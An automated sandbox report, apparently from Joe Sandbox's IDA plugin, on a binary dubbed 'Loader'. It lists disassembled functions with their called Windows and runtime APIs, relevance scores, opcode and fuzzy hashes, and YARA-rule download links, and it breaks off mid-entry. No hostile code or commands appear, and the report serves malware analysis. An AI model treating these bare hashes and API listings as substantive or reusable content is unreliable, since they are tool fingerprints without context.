Function 00A81960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A819B4

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8e48e4aad9a5430698c6f80dca0cfe46fb36330ae905f61bd8c1309b21f425b9
Instruction ID: 6479467f0c728e4569c3b32505857107f91c91d4b28b56842dcdf565518f50de
Opcode Fuzzy Hash: 8e48e4aad9a5430698c6f80dca0cfe46fb36330ae905f61bd8c1309b21f425b9
Instruction Fuzzy Hash: BE11A032610206ABDB14BB68DD569AA77ECEF04720B10817AF506D7141EB74E9069750

Function 00A81B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A8179C,00000000,00000000,?), ref: 00A81B39

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 6711266a8b047b2233b2c8c81a48346da1143d59053fb0f683f21452e2823f59
Instruction ID: e3a638c7f1e2da61b1106f4969c0b91b0718be6ebcd5f3a7fa63bd16dd569af7
Opcode Fuzzy Hash: 6711266a8b047b2233b2c8c81a48346da1143d59053fb0f683f21452e2823f59
Instruction Fuzzy Hash: DC01D632710112ABDB286B648C0DABA37ACEF40754F158829ED06E3180FA70EE42C790

Function 00A817D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

EnumSystemLocalesW.KERNEL32(00A81840,00000001,?,?,-00000050,?,00A8132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00A8181D

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bfc04cdff96ba04c984878dcd4e90c012ad3ffebf6f3e6be310ec8dffd6c49f0
Instruction ID: 51d43824e5b1fedc46c6b00abda09cbbaf94e719605e37259c70b44c5d9643b3
Opcode Fuzzy Hash: bfc04cdff96ba04c984878dcd4e90c012ad3ffebf6f3e6be310ec8dffd6c49f0
Instruction Fuzzy Hash: E9F0C2363003045FDB246F79DC82A6A7B99FF80768F05882DFA454B690DAB19C43CB50

Function 00A7D1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A780E1: EnterCriticalSection.KERNEL32(?,?,00A7C5F8,?,00A99290,00000008,00A7C4EA,?,?,?), ref: 00A780F0

EnumSystemLocalesW.KERNEL32(00A7D1B0,00000001,00A99310,0000000C,00A7CB11,-00000050), ref: 00A7D1F5

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f74b7001b6d3f4cad73f52c5abd4341d86d69cdfb57fb76d029f32b4ae200311
Instruction ID: a6145a93ab7af76dff76add2998a1678c58643bff7fc2939af2d9fde25b6ef6e
Opcode Fuzzy Hash: f74b7001b6d3f4cad73f52c5abd4341d86d69cdfb57fb76d029f32b4ae200311
Instruction Fuzzy Hash: F7F03772A04204EFDB10EFA8E942B9A77F0FB04721F00C52AF4149B2A1CB795941CF91

Function 00A81915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

EnumSystemLocalesW.KERNEL32(00A81960,00000001,?,?,?,00A81385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00A8194C

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f27b27e5827f2ed3a211d6156d29204ed4f43b6e55695efd733d34bcaeb8aa12
Instruction ID: b8e3744e303dd2cd93da6912a4efea161860f2714632d465af8d639dc4b809c7
Opcode Fuzzy Hash: f27b27e5827f2ed3a211d6156d29204ed4f43b6e55695efd733d34bcaeb8aa12
Instruction Fuzzy Hash: 63F0E53A30020557CB04AF39DC6566ABFA8EFC1B64F4A8059EA1A9B251CA759843C7A0

Function 00A7CC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00A76E33,?,20001004,00000000,00000002,?,?,00A75D3D), ref: 00A7CC49

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0f65291f3e135bb54ce68d96e48513d0c9506004ee1e28717c0a6b709d33c019
Instruction ID: 43015265424d165b6804175e8fcb60dec03c078680152aa5ab699bd75ec6e6b4
Opcode Fuzzy Hash: 0f65291f3e135bb54ce68d96e48513d0c9506004ee1e28717c0a6b709d33c019
Instruction Fuzzy Hash: B9E04F3250022CBBCF126F60EE04E9E3E6AEF44B60F04C026FD0D66121CB318D22AB91

Function 00A6F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00A6F8E2

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c15b1bba7f673ebbe9abdd1c2d8ee78c523c269f56a4f325dac91af44142d7ec
Instruction ID: 6811a82ae8bfb3a4168edc37c59e51d3adc3b21b9d75b6c8e981a4be4d413fbb
Opcode Fuzzy Hash: c15b1bba7f673ebbe9abdd1c2d8ee78c523c269f56a4f325dac91af44142d7ec
Instruction Fuzzy Hash:

Function 00A7D8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00A7D8E0

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 161eedc550867c4eae22b5a53701be6577d6b93fd2f2910dd5a937be7ffb7350
Instruction ID: c93dca9d734bea551fe0f64436923b9f0ce9cd61c0b0f5700bea143a90087d5a
Opcode Fuzzy Hash: 161eedc550867c4eae22b5a53701be6577d6b93fd2f2910dd5a937be7ffb7350
Instruction Fuzzy Hash: 0BA011303002028B8300CFB2AA082083AA8AA88AC0300802AA800CA020EE308082AF00

Function 00A8AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(02CB51C0,02CB51C0,00000000,7FFFFFFF,?,00A8AACD,02CB51C0,02CB51C0,00000000,02CB51C0,?,?,?,?,02CB51C0,00000000), ref: 00A8AB88
__alloca_probe_16.LIBCMT ref: 00A8AC43
__alloca_probe_16.LIBCMT ref: 00A8ACD2
__freea.LIBCMT ref: 00A8AD1D
__freea.LIBCMT ref: 00A8AD23
__freea.LIBCMT ref: 00A8AD59
__freea.LIBCMT ref: 00A8AD5F
__freea.LIBCMT ref: 00A8AD6F

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
Instruction ID: 11e5b0f80727d720d7a681db30d0104bce72141b0221337bb37e214791b2014c
Opcode Fuzzy Hash: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
Instruction Fuzzy Hash: 1571D4729006099BEF21BFA48D41BAF77B6EF65710F144057E905E7191E7759C00C7A2

Function 00A6FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00A6FE70
__alloca_probe_16.LIBCMT ref: 00A6FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00A6FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A6FF37
__alloca_probe_16.LIBCMT ref: 00A6FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A6FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A6FFB9

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
Instruction ID: 787545d4c174d215d3a2d29993570a68daf91bba26b3e29d2483b683c2b4d487
Opcode Fuzzy Hash: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
Instruction Fuzzy Hash: 10519E7260021AAFEB209F64EC45FAB7BB9EF41754F24443AF914DA1A0DB71DC11CB50

Function 00A7EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A7EEFC

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: eb7bc9b13de82987534d16cd792a0e483e4477f9a58ecb627fbf7690d8c64da0
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: 4DB13A72A00395AFDB15CF64CC81BAE7BA5EF59310F14C1A5E948AB382E774DE01C7A0

Function 00A70D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A70D77
___except_validate_context_record.LIBVCRUNTIME ref: 00A70D7F
_ValidateLocalCookies.LIBCMT ref: 00A70E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00A70E33
_ValidateLocalCookies.LIBCMT ref: 00A70E88

Strings

csm, xrefs: 00A70E1D

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b79000ee605fbc0b46260f0fe014dc8ca01e406e402a2917904e0e875c89fd1d
Instruction ID: d65053e9085c23ba8ef7f951131a3bc03213f1e5412165dba6542176dbc66257
Opcode Fuzzy Hash: b79000ee605fbc0b46260f0fe014dc8ca01e406e402a2917904e0e875c89fd1d
Instruction Fuzzy Hash: 8441C470A00218EBCF10DF68CC44E9E7BB5AF44314F14C565E91C9B352D735AD11CB91

Function 00A70080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A70086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A70094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00A700A5

Strings

kernel32.dll, xrefs: 00A70081
GetSystemTimePreciseAsFileTime, xrefs: 00A7008E
GetTempPath2W, xrefs: 00A7009A

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
Instruction ID: 55d2eb0944562f44c71735abc53541cb09506e6767333cdc5eb24fbb20b2493d
Opcode Fuzzy Hash: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
Instruction Fuzzy Hash: 5FD09E327456107B8B11DFF87C0D99A3AF9FE097123018953F545D2250DE7049028654

Function 00A84F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b4f816401e34a17b614f6dba37fc673e0b6bf212323248d9b48b6ee8359698
Instruction ID: f889dceaffeddcf834b886162409c225d62adc01dc9479db5e742a8249d27a29
Opcode Fuzzy Hash: 06b4f816401e34a17b614f6dba37fc673e0b6bf212323248d9b48b6ee8359698
Instruction Fuzzy Hash: 4BB1F374E04A49AFDB11EFB8CD80BADBBB1BF45304F148159F9049B292DB719D42CBA0

Function 00A69B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00A69C97
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00A69D06

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
Instruction ID: 2986e33cfc5d2197ecf166a884487921be5f6d9d35d5450ec26dff1ab1986b1c
Opcode Fuzzy Hash: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
Instruction Fuzzy Hash: B841D2B5900740CFDB30DB648A027AFB7F8AF45720F18062DE57A6A2D1D771A944CBA2

Function 00A7ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A7ACDE,00A70760,00A6B77F,A877E463,?,?,?,?,00A8BFCA,000000FF), ref: 00A7ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A7AD1C
SetLastError.KERNEL32(00000000,?,00A7ACDE,00A70760,00A6B77F,A877E463,?,?,?,?,00A8BFCA,000000FF), ref: 00A7AD6E

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
